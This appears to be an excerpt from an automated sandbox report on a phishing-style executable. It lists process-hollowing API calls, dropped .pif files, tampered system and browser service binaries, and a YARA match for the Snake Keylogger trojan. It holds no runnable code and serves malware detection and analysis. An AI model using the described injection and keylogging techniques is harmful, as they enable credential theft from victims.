                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28670 NtUnmapViewOfSection,0_2_02B28670
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28400 NtReadVirtualMemory,0_2_02B28400
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B27A2C NtAllocateVirtualMemory,0_2_02B27A2C
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02B2DC8C
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DC04
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D70
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B2DD70
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B27D78 NtWriteVirtualMemory,0_2_02B27D78
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B27A2A NtAllocateVirtualMemory,0_2_02B27A2A
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DBB0
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D6E
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,13_2_001A643A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,13_2_001A4823
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,13_2_001B7460
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A64CA NtQueryInformationToken,13_2_001A64CA
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A6500 NtQueryInformationToken,NtQueryInformationToken,13_2_001A6500
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001BA135 NtSetInformationFile,13_2_001BA135
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,13_2_001BC1FA
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00194E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,13_2_00194E3B
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,13_2_001A4759
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,22_2_001A643A
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,22_2_001A4823
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,22_2_001B7460
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A64CA NtQueryInformationToken,22_2_001A64CA
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A6500 NtQueryInformationToken,NtQueryInformationToken,22_2_001A6500
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001BA135 NtSetInformationFile,22_2_001BA135
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,22_2_001BC1FA
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_00194E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,22_2_00194E3B
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,22_2_001A4759
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00194C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,13_2_00194C10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B28788 CreateProcessAsUserW,0_2_02B28788
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\3f155f6931e417df.bin
                  Source: C:\Users\Public\alpha.pifFile created: C:\Windows
                  Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64
                  Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B120C40_2_02B120C4
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B3E5960_2_02B3E596
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004028B09_1_004028B0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004182449_1_00418244
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004193C49_1_004193C4
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00402B909_1_00402B90
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004073A09_1_004073A0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00408C609_1_00408C60
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0040DC119_1_0040DC11
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00407C3F9_1_00407C3F
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00418CCC9_1_00418CCC
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00406CA09_1_00406CA0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_0041A4BE9_1_0041A4BE
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00438DF69_1_00438DF6
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004016509_1_00401650
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00402F209_1_00402F20
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004187889_1_00418788
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_00402F899_1_00402F89
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004A7C0012_2_004A7C00
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004CA81012_2_004CA810
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004D2D4012_2_004D2D40
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004A79F012_2_004A79F0
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004C92A012_2_004C92A0
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004CEEB012_2_004CEEB0
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004C93B012_2_004C93B0
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00194C1013_2_00194C10
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019540A13_2_0019540A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A487513_2_001A4875
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001974B113_2_001974B1
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B695A13_2_001B695A
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019914413_2_00199144
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B419113_2_001B4191
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019EE0313_2_0019EE03
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00197A3413_2_00197A34
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00196E5713_2_00196E57
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_0019D66013_2_0019D660
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B3E6613_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001B769E13_2_001B769E
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A5A8613_2_001A5A86
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A3EB313_2_001A3EB3
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A4EC113_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_00196B2013_2_00196B20
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A074013_2_001A0740
                  Source: C:\Users\Public\alpha.pifCode function: 13_2_001A0BF013_2_001A0BF0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BAA81017_2_00BAA810
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B87C0017_2_00B87C00
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B879F017_2_00B879F0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BB2D4017_2_00BB2D40
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BAEEB017_2_00BAEEB0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BA92A017_2_00BA92A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BA93B017_2_00BA93B0
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_00194C1022_2_00194C10
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019540A22_2_0019540A
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A487522_2_001A4875
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001974B122_2_001974B1
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B695A22_2_001B695A
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019914422_2_00199144
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B419122_2_001B4191
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019EE0322_2_0019EE03
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_00197A3422_2_00197A34
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_00196E5722_2_00196E57
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_0019D66022_2_0019D660
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B3E6622_2_001B3E66
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001B769E22_2_001B769E
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A5A8622_2_001A5A86
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A3EB322_2_001A3EB3
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A4EC122_2_001A4EC1
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_00196B2022_2_00196B20
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A074022_2_001A0740
                  Source: C:\Users\Public\alpha.pifCode function: 22_2_001A0BF022_2_001A0BF0
                  Source: C:\Users\Public\xpha.pifCode function: 23_2_00771E2623_2_00771E26
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_0051A81024_2_0051A810
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_004F7C0024_2_004F7C00
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_00522D4024_2_00522D40
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_004F79F024_2_004F79F0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_0051EEB024_2_0051EEB0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_005192A024_2_005192A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_005193B024_2_005193B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_00897C0025_2_00897C00
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008BA81025_2_008BA810
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008979F025_2_008979F0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008C2D4025_2_008C2D40
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008B92A025_2_008B92A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008BEEB025_2_008BEEB0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008B93B025_2_008B93B0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D4A81026_2_00D4A810
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D27C0026_2_00D27C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D279F026_2_00D279F0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D52D4026_2_00D52D40
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D4EEB026_2_00D4EEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D492A026_2_00D492A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D493B026_2_00D493B0
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CD7C0027_2_00CD7C00
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CFA81027_2_00CFA810
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CD79F027_2_00CD79F0
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00D02D4027_2_00D02D40
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CF92A027_2_00CF92A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CFEEB027_2_00CFEEB0
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CF93B027_2_00CF93B0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_0077A81028_2_0077A810
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_00757C0028_2_00757C00
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_00782D4028_2_00782D40
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_007579F028_2_007579F0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_0077EEB028_2_0077EEB0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_007792A028_2_007792A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_007793B028_2_007793B0
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_0056A81030_2_0056A810
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_00547C0030_2_00547C00
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_00572D4030_2_00572D40
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_005479F030_2_005479F0
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_0056EEB030_2_0056EEB0
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_005692A030_2_005692A0
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_005693B030_2_005693B0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_0075A81031_2_0075A810
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_00737C0031_2_00737C00
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_00762D4031_2_00762D40
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_007379F031_2_007379F0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_0075EEB031_2_0075EEB0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_007592A031_2_007592A0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_007593B031_2_007593B0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: String function: 0040E1D8 appears 43 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B146D4 appears 244 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B289D0 appears 45 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B2894C appears 56 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B144DC appears 74 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B14500 appears 33 times
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: String function: 02B14860 appears 949 times
                  Source: chrmstp.exe.9.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: chrmstp.exe.9.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                  Source: setup.exe.9.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: setup.exe.9.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: Number of sections : 13 > 10
                  Source: chrome_proxy.exe.9.drStatic PE information: Number of sections : 12 > 10
                  Source: setup.exe0.9.drStatic PE information: Number of sections : 13 > 10
                  Source: setup.exe.9.drStatic PE information: Number of sections : 14 > 10
                  Source: identity_helper.exe.9.drStatic PE information: Number of sections : 12 > 10
                  Source: msedgewebview2.exe.9.drStatic PE information: Number of sections : 14 > 10
                  Source: elevation_service.exe0.9.drStatic PE information: Number of sections : 12 > 10
                  Source: notification_helper.exe.9.drStatic PE information: Number of sections : 13 > 10
                  Source: chrmstp.exe.9.drStatic PE information: Number of sections : 14 > 10
                  Source: firefox.exe.9.drStatic PE information: Number of sections : 11 > 10
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: Number of sections : 11 > 10
                  Source: elevation_service.exe.9.drStatic PE information: Number of sections : 12 > 10
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeBinary or memory string: OriginalFilename vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000B45000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
                  Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
